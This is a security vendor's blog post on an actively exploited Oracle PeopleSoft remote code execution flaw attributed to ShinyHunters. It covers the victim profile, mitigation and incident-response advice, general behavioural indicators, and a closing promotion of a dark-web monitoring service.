A critical zero-day in Oracle PeopleSoft is being actively exploited by one of the most prolific data-theft groups operating today, and if your organisation runs PeopleTools 8.61 or 8.62, whether you're a university, a government body, or a large enterprise, you need to act before Oracle's full patch arrives. BleepingComputer broke the news that Oracle has issued emergency mitigations for CVE-2026-35273, a flaw carrying a CVSS base score of 9.8 , about as severe as vulnerabilities get. The group behind the exploitation, ShinyHunters, has already claimed to have hit roughly 300 PeopleSoft instances across 100 organisations. The victims are mostly universities. The data taken includes exactly the kind of personal and financial records that fuel extortion campaigns and dark web auctions.
CVE-2026-35273 is a remote code execution vulnerability in Oracle PeopleSoft Enterprise PeopleTools, specifically versions 8.61 and 8.62. What makes it particularly dangerous isn't just the severity score. It's the authentication requirement , or rather, the complete absence of one. An attacker with network access to a vulnerable instance doesn't need valid credentials, a stolen session token, or any form of prior access. They send a crafted request, and the system executes arbitrary code. Full stop.
For any security manager who has spent time thinking about what attack surface really means for a business, this is the scenario that keeps you up at night. PeopleSoft deployments at universities and large organisations are frequently exposed to the public internet precisely because they need to be , student self-service portals, faculty access systems, and HR modules have to be reachable from outside the campus network. That design requirement, entirely legitimate in isolation, transforms CVE-2026-35273 into a trivially accessible entry point for anyone who knows where to look.
Oracle PeopleSoft is an ERP platform that sits at the heart of how governments, universities, and corporations manage HR, payroll, finance, and in academic settings, student information. The data it holds , social security numbers, dates of birth, salary records, academic transcripts, banking details for payroll , is precisely what financially motivated threat actors target. It's not peripheral data. It's the core administrative record of an institution, and a successful breach of a PeopleSoft instance is effectively a breach of everything that institution knows about every employee, every student, and every financial transaction it has processed.
The timeline here should concern every security team running PeopleSoft. According to Rapid7, active exploitation of CVE-2026-35273 was observed from 27 May 2026 through to 9 June 2026 , a two-week window that predated Oracle's advisory entirely. That means ShinyHunters was actively compromising PeopleSoft instances while Oracle had no public guidance, no patch, and no official acknowledgement that anything was wrong.
Two weeks is a long time. In that window, threat actors aren't just poking around looking for data. They're establishing persistence, exfiltrating records, and in ShinyHunters' case, almost certainly preparing victim lists for extortion contact. By the time Oracle's emergency mitigation appeared, a significant number of organisations had already been compromised without knowing it. If you were running a vulnerable instance during that period, the absence of an alert in your SIEM is not evidence that nothing happened , it may simply mean you weren't detecting the right things.
This kind of gap between exploitation in the wild and vendor response is not unusual, but it underlines why cyber threat intelligence that tracks threat actor behaviour and emerging exploitation patterns , rather than waiting for vendor advisories , is operationally necessary rather than a nice-to-have.
ShinyHunters is a financially motivated cybercriminal collective with a track record that spans several years and spans sectors. They are not a nation-state actor, not an APT operating under government direction. They are criminals motivated by money, and they are extremely good at identifying high-value targets, extracting large volumes of data quickly, and then monetising that data through a combination of dark web sales and direct extortion pressure on victims.
Their most prominent recent operation before this PeopleSoft campaign was the 2024 Snowflake credential-based attack wave. As SecurityWeek reported, that campaign impacted Ticketmaster, Santander Bank, and a range of other organisations whose data was stored in Snowflake cloud environments. The Snowflake incidents didn't rely on a vulnerability in Snowflake itself , they exploited stolen credentials to access customer tenants that lacked multi-factor authentication. The PeopleSoft campaign is different in mechanism but identical in intent: get in, get the data, monetise it.
What connects these two operations is ShinyHunters' consistent focus on platforms that aggregate large volumes of sensitive personal and financial records. Snowflake customers often use the platform to centralise data analytics across millions of records. PeopleSoft, similarly, centralises HR, payroll, and student information for entire institutions. The targets aren't chosen randomly. ShinyHunters looks for systems where a single successful compromise yields the highest possible volume of exploitable personal data.
Mandiant tracks this group under the designation UNC6240, which they equate with the publicly known ShinyHunters collective. The attribution was confirmed by Google's Mandiant following their analysis of the PeopleSoft exploitation campaign, as both Rapid7 and SecurityWeek reported. The UNC designation signals that Mandiant has sufficient evidence to cluster the activity but may still be building out the full picture of the group's infrastructure and membership.
The operational playbook UNC6240 follows is consistent across campaigns. First, mass scanning and exploitation of a known vulnerability or stolen credential set. Then rapid data exfiltration , they are not interested in dwell time for espionage purposes, they want to get data out fast. After exfiltration comes the extortion phase, where victims are contacted directly before the data is listed for sale on dark web forums. Historically, ShinyHunters has sold stolen data sets on forums including BreachForums, often auctioning high-value data sets to the highest bidder when victims refuse to pay.
Understanding what stolen credentials and exfiltrated data look like when they surface on dark web forums is central to identifying whether your organisation was hit during the exploitation window. Monitoring those channels for mentions of your domain, your employees' records, or your institution's data is how security teams get advance warning before a formal breach notification arrives , or before it never arrives at all, because the attacker chose to sell the data quietly rather than contact the victim. If you're not already watching those channels, the question is not whether this matters, but how much exposure you've already accumulated without knowing it.
The victim profile for this campaign is stark. According to The Hacker News, 68% of identified victims are universities and academic institutions. That concentration is not accidental. Higher education has a structural exposure problem with PeopleSoft that other sectors are less likely to share.
Universities run PeopleSoft for everything , student admissions records, financial aid processing, faculty HR and payroll, tuition billing, academic transcripts. The system is operationally central, and it has to be accessible from outside the campus network for students checking their financial aid status, for faculty accessing payroll, for applicants tracking admissions. That internet-facing requirement, combined with IT resource constraints that many universities face relative to the size and complexity of their estates, creates conditions where unpatched vulnerabilities persist longer than they would in a well-resourced enterprise security team.
The data profile of a university PeopleSoft instance is also exceptionally valuable from an attacker's perspective. A single university might have records covering tens of thousands of current students, alumni, and staff members. Those records include dates of birth, national identity numbers, home addresses, emergency contacts, bank account details for payroll direct deposits, academic performance records, and disciplinary histories. For an extortion group, that's leverage over both the institution and potentially over individuals whose records have been exfiltrated. The combination of scale and sensitivity makes universities an almost ideal target for financially motivated actors running this kind of campaign.
ShinyHunters' own claims put the scope of this campaign at approximately 300 PeopleSoft instances belonging to around 100 organisations, as reported by The Hacker News. Take those figures with appropriate scepticism , threat actors routinely overstate the scope of their campaigns to increase extortion pressure and inflate the apparent value of data they're selling. But even if the real numbers are materially lower, the scale is significant.
One hundred organisations across a two-week exploitation window, before any public advisory existed, means that a substantial proportion of those victims had no opportunity to patch, no external warning, and no vendor guidance to act on. Some will have detected the intrusion through internal monitoring. Many will not have. And because ShinyHunters' playbook involves direct extortion contact before public disclosure, some organisations may already be managing a private negotiation or breach response without any public indication that they've been affected.
For security managers in EMEA who run PeopleSoft, the relevant question right now isn't whether your organisation was on the original target list. It's whether your instance was internet-accessible during the exploitation window, whether you've reviewed your logs from 27 May onwards, and whether you've seen any anomalous outbound data transfer or unusual process execution on your PeopleSoft application servers. The absence of a notification from ShinyHunters or from Oracle is not confirmation that you're clean.
Oracle has released emergency mitigations for CVE-2026-35273, with a full patch described as forthcoming. That distinction matters. An emergency mitigation is not the same as a patch. It typically involves configuration changes, workarounds, or temporary controls that reduce the immediate attack surface without fully resolving the underlying vulnerability. It buys time. It does not close the door.
The two-week gap between the start of active exploitation on 27 May and Oracle's advisory is partly an artefact of how zero-day discovery and vendor response works in practice. Vendors need time to triage reports, confirm the vulnerability, develop and test a fix, and prepare communications. That process takes time even under emergency conditions. But from an operator's perspective, the outcome is the same: your system was potentially exposed and being actively targeted while you had no vendor-provided defence to deploy.
Emergency mitigations should be applied immediately if you haven't done so already. But they need to be treated as a temporary measure, not a resolution. Oracle's full patch, when it arrives, should be treated as a P1 deployment task with no discretionary delay. Given that ShinyHunters is already sitting on exfiltrated data from this campaign, the risk doesn't disappear when the technical vulnerability is closed , but it does significantly reduce the chance of additional exploitation of your specific instance.
It's also worth being clear about what Oracle's response does and doesn't cover. The mitigation addresses the vulnerability. It does nothing for organisations that were already compromised during the exploitation window. If your instance was accessible and unpatched between 27 May and 9 June, applying the mitigation now stops further exploitation of CVE-2026-35273 but doesn't remove any backdoors or persistence mechanisms that may already have been established. Post-compromise investigation is a separate and necessary step.
Apply Oracle's emergency mitigation immediately. That's the baseline , if you haven't done this, it supersedes everything else in this section. Oracle's official advisory contains the specific configuration guidance; follow it exactly and document what you've changed.
Simultaneously, review your PeopleSoft application server logs for the period from 27 May 2026 onwards. You're looking for evidence of unexpected process spawning from the PeopleSoft application tier, anomalous outbound network connections, unusual volumes of data being accessed or transferred, and any authentication events that don't match known user patterns. Log retention policies vary significantly across organisations, and if you don't have 30 days of application-level logs, that's a gap to address as a structural matter once you've dealt with the immediate incident response requirements.
If you find evidence of compromise , or if you simply cannot rule it out because your logging wasn't sufficient , treat this as an active incident. Engage your incident response team or an external IR partner. Don't patch and move on. A PeopleSoft compromise that established persistence before Oracle's mitigation was available may still have active backdoors, scheduled tasks, or exfiltration mechanisms in place that are unrelated to the original CVE-2026-35273 exploit chain.
Network segmentation is a control that can significantly reduce the blast radius of any future exploitation of your PeopleSoft environment. If your PeopleSoft application servers currently have broad outbound internet access, that's a configuration that deserves review. The exfiltration phase of ShinyHunters' campaigns requires outbound connectivity to attacker-controlled infrastructure , restricting what your application servers can reach externally makes that phase harder. It doesn't prevent exploitation of a vulnerability, but it can prevent or delay the data theft that follows.
For institutions running internet-facing PeopleSoft student portals, consider whether any temporary access restrictions are operationally feasible during the period before Oracle's full patch is available. Even a temporary reduction in public exposure reduces the chance of opportunistic exploitation by actors other than ShinyHunters who may now be aware of this vulnerability.
Finally, search dark web forums and data marketplaces for mentions of your institution's name, domain, or data. Understanding what indicators of compromise look like when they surface in criminal environments is as important as reviewing your internal logs. ShinyHunters has a well-established pattern of listing stolen data on forums before or during extortion contact. If your data is already on the market, knowing that earlier rather than later changes your response options significantly.
At the time of writing, Oracle and Mandiant have not released a comprehensive public IoC set for CVE-2026-35273 exploitation. What is known from the Rapid7 analysis is that exploitation was active between 27 May and 9 June 2026, and that the campaign was attributed to UNC6240. Security teams should monitor their own threat intelligence feeds and vendor channels for updated IoC releases as the investigation matures.
Behavioural indicators to prioritise in your environment include unexpected child processes spawned by PeopleSoft application server processes, outbound connections from application servers to external IP ranges with no business justification, large or unusual queries against student records, HR, or payroll tables that don't correspond to known batch jobs or user activity, and any new scheduled tasks or cron jobs on PeopleSoft application or database servers created after 27 May 2026.
Endpoint detection tools deployed on PeopleSoft application servers should be checked to confirm they are running and that their detections during the exploitation window have been reviewed. A gap in EDR telemetry during that period warrants investigation , ShinyHunters has historically used techniques that attempt to evade or disable endpoint monitoring as part of post-exploitation activity.
Network-level indicators include unexpected DNS lookups to external domains from PeopleSoft application servers and anomalous data volumes on egress links connected to application server network segments. Baseline your normal outbound traffic from PeopleSoft infrastructure if you haven't already , you can't identify anomalous behaviour without a reference point for what normal looks like.
Oracle PeopleSoft is one of the most widely deployed ERP platforms in the higher education sector because it was built to handle the specific administrative complexity of universities , managing student admissions, financial aid, tuition billing, academic records, and faculty HR all within a single integrated system. Many universities have run PeopleSoft for decades, building significant institutional processes around it, which makes migration to alternative platforms costly and disruptive. The platform also has extensive self-service functionality that universities need for students and staff to access their own records remotely, which is why PeopleSoft instances in this sector are frequently internet-accessible.
A PeopleSoft deployment at a university or large organisation typically contains some of the most sensitive personal and financial data an institution holds. This includes national identity numbers or social security numbers, dates of birth, home addresses, bank account details used for payroll direct deposits, salary records, academic transcripts, disciplinary records, emergency contact information, and financial aid data. For a financially motivated group like ShinyHunters, this combination is valuable both for direct extortion of the institution and for resale of individual records on dark web markets, where identity data of this type commands significant prices.
The emergency mitigation Oracle has released addresses the immediate exploitation vector for CVE-2026-35273 and should be applied without delay. However, it is a temporary control, not a full resolution of the underlying vulnerability. Oracle has indicated a complete patch is forthcoming, and that patch should be treated as a priority deployment the moment it becomes available. Additionally, for any organisation that was running an exposed, unpatched PeopleSoft instance between 27 May and 9 June 2026, applying the mitigation now addresses future exploitation risk but does not remediate a potential existing compromise. Post-exploitation investigation is required separately.
The most direct method is to attempt to access your PeopleSoft web server and its key endpoints from an external network , a mobile connection or a system outside your corporate perimeter , without using a VPN. If the login page or any application functionality is reachable, your instance has internet exposure. You can also use external attack surface discovery tools or services that scan for internet-facing services to check what your PeopleSoft deployment looks like from the perspective of an external attacker. Shodan and similar platforms index internet-facing PeopleSoft portals; if yours appears there, it was accessible during the exploitation window. Firewall and proxy logs showing inbound connections to your PeopleSoft application server ports from external IP ranges will also confirm exposure.
UNC6240 is Mandiant's internal tracking designation for activity they have attributed to the group publicly known as ShinyHunters. Mandiant uses UNC designations , "uncategorised" clusters , when they have sufficient technical evidence to group activity together but may still be refining their understanding of the group's full infrastructure, membership, or operational scope. In this case, Mandiant has confirmed the equation between UNC6240 and ShinyHunters explicitly, as reported by both Rapid7 and SecurityWeek. The practical implication for defenders is that the TTPs, monetisation methods, and historical campaigns associated with ShinyHunters , including the 2024 Snowflake campaign , are all relevant context for understanding what this group is likely to do with data exfiltrated from PeopleSoft victims.
Attacks like this one rarely announce themselves through official channels first. New payloads, active infrastructure, and exploitation techniques circulate in closed forums and private channels well before any public research surfaces them. By the time an incident makes it into a threat report, organisations without early visibility are already behind.
Defendis gives your security team that early visibility. We monitor the dark web, underground forums, and threat actor channels so your team receives relevant intelligence before it becomes breaking news, context about emerging threats matched against your organisation's exposure, without requiring your analysts to spend time in places they should not have to go.
